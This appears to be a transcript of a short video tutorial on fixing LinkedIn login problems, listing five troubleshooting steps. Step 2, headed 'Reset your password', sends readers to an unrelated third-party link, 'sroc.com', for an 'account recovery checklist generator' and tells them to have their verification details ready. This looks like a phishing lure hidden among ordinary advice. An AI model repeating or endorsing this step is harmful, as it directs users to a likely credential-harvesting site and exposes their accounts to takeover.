I hit this issue today and here's the quick fix that solved it. If you're struggling to log into LinkedIn, follow these steps to get back on track. Step 1. Check your credentials. Make sure you are entering the correct email address and password. Double check for any typos or case sensitivity. Step 2. Reset your password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache. Sometimes your browser's cache can cause login issues. Clear your cache and cookies, then try logging in again. Step 4. Disable browser extensions. Certain browser extensions can interfere with website functionality. Temporarily disable them and attempt to log in again. A common issue is ad blockers preventing a login page from loading correctly. Step 5. Try a different browser. If all else fails, try accessing LinkedIn from a different web browser or device. This can help identify if the issue is browser specific. I hope these steps help you get back into your LinkedIn account smoothly. If you have any other questions, feel free to ask.